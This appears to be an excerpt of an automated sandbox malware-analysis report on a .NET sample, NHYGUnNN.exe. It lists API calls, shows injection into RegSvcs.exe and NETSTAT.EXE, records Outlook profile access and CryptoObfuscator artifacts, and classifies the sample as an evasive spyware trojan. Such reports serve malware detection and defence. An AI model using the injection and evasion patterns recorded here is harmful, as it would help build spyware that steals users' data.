      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_013220A01_2_013220A0
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_013C20A81_2_013C20A8
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0130B0901_2_0130B090
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_013C28EC1_2_013C28EC
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_013C2B281_2_013C2B28
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0131A3091_2_0131A309
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0131AB401_2_0131AB40
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0139CB4F1_2_0139CB4F
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0132EBB01_2_0132EBB0
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0132138B1_2_0132138B
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_013A23E31_2_013A23E3
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_013B03DA1_2_013B03DA
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_013BDBD21_2_013BDBD2
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0132ABD81_2_0132ABD8
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0131B2361_2_0131B236
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_013AFA2B1_2_013AFA2B
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_013C22AE1_2_013C22AE
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_013B4AEF1_2_013B4AEF
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_012F0D201_2_012F0D20
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_013C2D071_2_013C2D07
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_013C1D551_2_013C1D55
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_013225811_2_01322581
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_013B2D821_2_013B2D82
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0130D5E01_2_0130D5E0
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_013C25DD1_2_013C25DD
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0130841F1_2_0130841F
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0131B4771_2_0131B477
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_013BD4661_2_013BD466
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_013B44961_2_013B4496
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_013C1FF11_2_013C1FF1
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_013CDFCE1_2_013CDFCE
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01316E301_2_01316E30
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_013BD6161_2_013BD616
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_013C2EF71_2_013C2EF7
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_004012A41_2_004012A4
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_00409ACC1_2_00409ACC
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0040B4671_2_0040B467
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_004044C71_2_004044C7
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0042257F1_2_0042257F
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_004046E71_2_004046E7
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0040FE971_2_0040FE97
      Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_035BAB4010_2_035BAB40
      Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_03662B2810_2_03662B28
      Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_035BA30910_2_035BA309
      Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_035CABD810_2_035CABD8
      Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_0365DBD210_2_0365DBD2
      Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_036503DA10_2_036503DA
      Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_035CEBB010_2_035CEBB0
      Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_0364FA2B10_2_0364FA2B
      Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_036622AE10_2_036622AE
      Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_0359F90010_2_0359F900
      Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_035B412010_2_035B4120
      Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_035B99BF10_2_035B99BF
      Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_0366E82410_2_0366E824
      Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_0365100210_2_03651002
      Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_035BA83010_2_035BA830
      Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_036628EC10_2_036628EC
      Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_035AB09010_2_035AB090
      Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_036620A810_2_036620A8
      Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_035C20A010_2_035C20A0
      Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_03661FF110_2_03661FF1
      Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_0366DFCE10_2_0366DFCE
      Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_035B6E3010_2_035B6E30
      Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_0365D61610_2_0365D616
      Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_03662EF710_2_03662EF7
      Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_03661D5510_2_03661D55
      Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_03662D0710_2_03662D07
      Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_03590D2010_2_03590D20
      Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_035AD5E010_2_035AD5E0
      Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_036625DD10_2_036625DD
      Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_035C258110_2_035C2581
      Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_0365D46610_2_0365D466
      Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_035A841F10_2_035A841F
      Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_00BC88B010_2_00BC88B0
      Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_00BCE76010_2_00BCE760
      Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_00BC2D9010_2_00BC2D90
      Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_00BC9D3010_2_00BC9D30
      Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_00BE0E4810_2_00BE0E48
      Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_00BC2FB010_2_00BC2FB0
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: String function: 012FB150 appears 136 times
      Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: String function: 0359B150 appears 87 times
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01339910 NtAdjustPrivilegesToken,LdrInitializeThunk,1_2_01339910
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_013399A0 NtCreateSection,LdrInitializeThunk,1_2_013399A0
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01339860 NtQuerySystemInformation,LdrInitializeThunk,1_2_01339860
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01339840 NtDelayExecution,LdrInitializeThunk,1_2_01339840
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_013398F0 NtReadVirtualMemory,LdrInitializeThunk,1_2_013398F0
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01339A20 NtResumeThread,LdrInitializeThunk,1_2_01339A20
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01339A00 NtProtectVirtualMemory,LdrInitializeThunk,1_2_01339A00
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01339A50 NtCreateFile,LdrInitializeThunk,1_2_01339A50
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01339540 NtReadFile,LdrInitializeThunk,1_2_01339540
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_013395D0 NtClose,LdrInitializeThunk,1_2_013395D0
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01339710 NtQueryInformationToken,LdrInitializeThunk,1_2_01339710
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_013397A0 NtUnmapViewOfSection,LdrInitializeThunk,1_2_013397A0
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01339780 NtMapViewOfSection,LdrInitializeThunk,1_2_01339780
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01339FE0 NtCreateMutant,LdrInitializeThunk,1_2_01339FE0
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01339660 NtAllocateVirtualMemory,LdrInitializeThunk,1_2_01339660
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_013396E0 NtFreeVirtualMemory,LdrInitializeThunk,1_2_013396E0
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01339950 NtQueueApcThread,1_2_01339950
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_013399D0 NtCreateProcessEx,1_2_013399D0
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01339820 NtEnumerateKey,1_2_01339820
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0133B040 NtSuspendThread,1_2_0133B040
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_013398A0 NtWriteVirtualMemory,1_2_013398A0
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01339B00 NtSetValueKey,1_2_01339B00
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0133A3B0 NtGetContextThread,1_2_0133A3B0
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01339A10 NtQuerySection,1_2_01339A10
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01339A80 NtOpenDirectoryObject,1_2_01339A80
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0133AD30 NtSetContextThread,1_2_0133AD30
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01339520 NtWaitForSingleObject,1_2_01339520
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01339560 NtWriteFile,1_2_01339560
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_013395F0 NtQueryInformationFile,1_2_013395F0
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01339730 NtQueryVirtualMemory,1_2_01339730
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0133A710 NtOpenProcessToken,1_2_0133A710
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0133A770 NtOpenThread,1_2_0133A770
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01339770 NtSetInformationFile,1_2_01339770
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01339760 NtOpenProcess,1_2_01339760
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01339610 NtEnumerateValueKey,1_2_01339610
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01339670 NtQueryInformationProcess,1_2_01339670
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01339650 NtQueryValueKey,1_2_01339650
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_013396D0 NtCreateKey,1_2_013396D0
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0041E087 NtAllocateVirtualMemory,1_2_0041E087
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_004012A4 NtProtectVirtualMemory,1_2_004012A4
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0041DEA7 NtCreateFile,1_2_0041DEA7
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0041DF57 NtReadFile,1_2_0041DF57
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0041DFD7 NtClose,1_2_0041DFD7
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0041E083 NtAllocateVirtualMemory,1_2_0041E083
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_004014E9 NtProtectVirtualMemory,1_2_004014E9
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0041DEA1 NtCreateFile,1_2_0041DEA1
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0041DFD1 NtClose,1_2_0041DFD1
      Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_035D9A50 NtCreateFile,LdrInitializeThunk,10_2_035D9A50
      Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_035D9910 NtAdjustPrivilegesToken,LdrInitializeThunk,10_2_035D9910
      Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_035D99A0 NtCreateSection,LdrInitializeThunk,10_2_035D99A0
      Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_035D9840 NtDelayExecution,LdrInitializeThunk,10_2_035D9840
      Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_035D9860 NtQuerySystemInformation,LdrInitializeThunk,10_2_035D9860
      Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_035D9710 NtQueryInformationToken,LdrInitializeThunk,10_2_035D9710
      Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_035D9FE0 NtCreateMutant,LdrInitializeThunk,10_2_035D9FE0
      Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_035D9780 NtMapViewOfSection,LdrInitializeThunk,10_2_035D9780
      Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_035D9650 NtQueryValueKey,LdrInitializeThunk,10_2_035D9650
      Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_035D9660 NtAllocateVirtualMemory,LdrInitializeThunk,10_2_035D9660
      Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_035D9610 NtEnumerateValueKey,LdrInitializeThunk,10_2_035D9610
      Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_035D96D0 NtCreateKey,LdrInitializeThunk,10_2_035D96D0
      Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_035D96E0 NtFreeVirtualMemory,LdrInitializeThunk,10_2_035D96E0
      Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_035D9540 NtReadFile,LdrInitializeThunk,10_2_035D9540
      Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_035D9560 NtWriteFile,LdrInitializeThunk,10_2_035D9560
      Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_035D95D0 NtClose,LdrInitializeThunk,10_2_035D95D0
      Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_035D9B00 NtSetValueKey,10_2_035D9B00
      Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_035DA3B0 NtGetContextThread,10_2_035DA3B0
      Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_035D9A10 NtQuerySection,10_2_035D9A10
      Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_035D9A00 NtProtectVirtualMemory,10_2_035D9A00
      Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_035D9A20 NtResumeThread,10_2_035D9A20
      Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_035D9A80 NtOpenDirectoryObject,10_2_035D9A80
      Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_035D9950 NtQueueApcThread,10_2_035D9950
      Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_035D99D0 NtCreateProcessEx,10_2_035D99D0
      Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_035DB040 NtSuspendThread,10_2_035DB040
      Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_035D9820 NtEnumerateKey,10_2_035D9820
      Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_035D98F0 NtReadVirtualMemory,10_2_035D98F0
      Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_035D98A0 NtWriteVirtualMemory,10_2_035D98A0
      Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_035DA770 NtOpenThread,10_2_035DA770
      Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_035D9770 NtSetInformationFile,10_2_035D9770
      Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_035D9760 NtOpenProcess,10_2_035D9760
      Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_035DA710 NtOpenProcessToken,10_2_035DA710
      Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_035D9730 NtQueryVirtualMemory,10_2_035D9730
      Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_035D97A0 NtUnmapViewOfSection,10_2_035D97A0
      Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_035D9670 NtQueryInformationProcess,10_2_035D9670
      Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_035DAD30 NtSetContextThread,10_2_035DAD30
      Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_035D9520 NtWaitForSingleObject,10_2_035D9520
      Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_035D95F0 NtQueryInformationFile,10_2_035D95F0
      Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_00BDC8A0 NtClose,10_2_00BDC8A0
      Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_00BDC820 NtReadFile,10_2_00BDC820
      Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_00BDC870 NtDeleteFile,10_2_00BDC870
      Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_00BDC950 NtAllocateVirtualMemory,10_2_00BDC950
      Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_00BDC770 NtCreateFile,10_2_00BDC770
      Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_00BDC89A NtClose,10_2_00BDC89A
      Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_00BDC8CA NtDeleteFile,10_2_00BDC8CA
      Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_00BDC94C NtAllocateVirtualMemory,10_2_00BDC94C
      Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_00BDC76A NtCreateFile,10_2_00BDC76A
      Source: NHYGUnNN.exeStatic PE information: No import functions for PE file found
      Source: NHYGUnNN.exe, 00000000.00000002.237146160.0000012A25D66000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameHMMCXNXCJKFD.exe: vs NHYGUnNN.exe
      Source: NHYGUnNN.exe, 00000000.00000002.238037858.0000012A279A8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameBUMBUM.dll. vs NHYGUnNN.exe
      Source: NHYGUnNN.exe, 00000000.00000002.237199303.0000012A25EE0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs NHYGUnNN.exe
      Source: NHYGUnNN.exe, 00000000.00000002.237890834.0000012A27840000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameBUMBUM.dll. vs NHYGUnNN.exe
      Source: NHYGUnNN.exeBinary or memory string: OriginalFilenameHMMCXNXCJKFD.exe: vs NHYGUnNN.exe
      Source: NHYGUnNN.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
      Source: NHYGUnNN.exeReversingLabs: Detection: 27%
      Source: NHYGUnNN.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
      Source: C:\Users\user\Desktop\NHYGUnNN.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
      Source: unknownProcess created: C:\Users\user\Desktop\NHYGUnNN.exe C:\Users\user\Desktop\NHYGUnNN.exe
      Source: C:\Users\user\Desktop\NHYGUnNN.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\Regsvcs.exe
      Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\NETSTAT.EXE C:\Windows\SysWOW64\NETSTAT.EXE
      Source: C:\Users\user\Desktop\NHYGUnNN.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\Regsvcs.exeJump to behavior
      Source: C:\Windows\SysWOW64\NETSTAT.EXEKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{3C374A40-BAE4-11CF-BF7D-00AA006946EE}\InProcServer32Jump to behavior
      Source: C:\Users\user\Desktop\NHYGUnNN.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\NHYGUnNN.exe.logJump to behavior
      Source: C:\Windows\SysWOW64\NETSTAT.EXEFile created: C:\Users\user\AppData\Local\Temp\1--Lt08NNJump to behavior
      Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@4/2@6/6
      Source: NHYGUnNN.exeStatic file information: TRID: Win64 Executable GUI Net Framework (217006/5) 47.53%
      Source: C:\Users\user\Desktop\NHYGUnNN.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dllJump to behavior
      Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
      Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
      Source: C:\Windows\SysWOW64\NETSTAT.EXEKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\Jump to behavior
      Source: NHYGUnNN.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
      Source: NHYGUnNN.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
      Source: NHYGUnNN.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
      Source: Binary string: C:\Users\Administrator\Documents\CryptoObfuscator_Output\HMMCXNXCJKFD.pdb source: NHYGUnNN.exe
      Source: Binary string: RegSvcs.pdb, source: NETSTAT.EXE, 0000000A.00000002.501502525.00000000038B3000.00000004.10000000.00040000.00000000.sdmp
      Source: Binary string: wntdll.pdbUGP source: RegSvcs.exe, 00000001.00000003.237929727.0000000001137000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.318452045.00000000012D0000.00000040.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000003.236683417.0000000000F98000.00000004.00000800.00020000.00000000.sdmp, NETSTAT.EXE, 0000000A.00000002.500840419.000000000368F000.00000040.00000800.00020000.00000000.sdmp, NETSTAT.EXE, 0000000A.00000003.320124356.00000000033DE000.00000004.00000800.00020000.00000000.sdmp, NETSTAT.EXE, 0000000A.00000003.318032789.00000000031D3000.00000004.00000800.00020000.00000000.sdmp, NETSTAT.EXE, 0000000A.00000002.499590658.0000000003570000.00000040.00000800.00020000.00000000.sdmp
      Source: Binary string: C:\Users\Administrator\Documents\CryptoObfuscator_Output\BUMBUM.pdb source: NHYGUnNN.exe, 00000000.00000002.238037858.0000012A279A8000.00000004.00000800.00020000.00000000.sdmp, NHYGUnNN.exe, 00000000.00000002.237890834.0000012A27840000.00000004.08000000.00040000.00000000.sdmp
      Source: Binary string: wntdll.pdb source: RegSvcs.exe, RegSvcs.exe, 00000001.00000003.237929727.0000000001137000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.318452045.00000000012D0000.00000040.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000003.236683417.0000000000F98000.00000004.00000800.00020000.00000000.sdmp, NETSTAT.EXE, NETSTAT.EXE, 0000000A.00000002.500840419.000000000368F000.00000040.00000800.00020000.00000000.sdmp, NETSTAT.EXE, 0000000A.00000003.320124356.00000000033DE000.00000004.00000800.00020000.00000000.sdmp, NETSTAT.EXE, 0000000A.00000003.318032789.00000000031D3000.00000004.00000800.00020000.00000000.sdmp, NETSTAT.EXE, 0000000A.00000002.499590658.0000000003570000.00000040.00000800.00020000.00000000.sdmp
      Source: Binary string: C:\Users\Administrator\Documents\CryptoObfuscator_Output\HMMCXNXCJKFD.pdbBSJB source: NHYGUnNN.exe
      Source: Binary string: RegSvcs.pdb source: NETSTAT.EXE, 0000000A.00000002.501502525.00000000038B3000.00000004.10000000.00040000.00000000.sdmp
      Source: Binary string: C:\Users\Administrator\Documents\CryptoObfuscator_Output\BUMBUM.pdbBSJB source: NHYGUnNN.exe, 00000000.00000002.238037858.0000012A279A8000.00000004.00000800.00020000.00000000.sdmp, NHYGUnNN.exe, 00000000.00000002.237890834.0000012A27840000.00000004.08000000.00040000.00000000.sdmp

      Data Obfuscation

      barindex
      .NET source code contains potential unpacker
      Source: NHYGUnNN.exe, A/cb0864eb24eeeb94488d89ba2673ea289.cs.Net Code: c7f594fa444d3738d4ed4d33557eff5b6 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
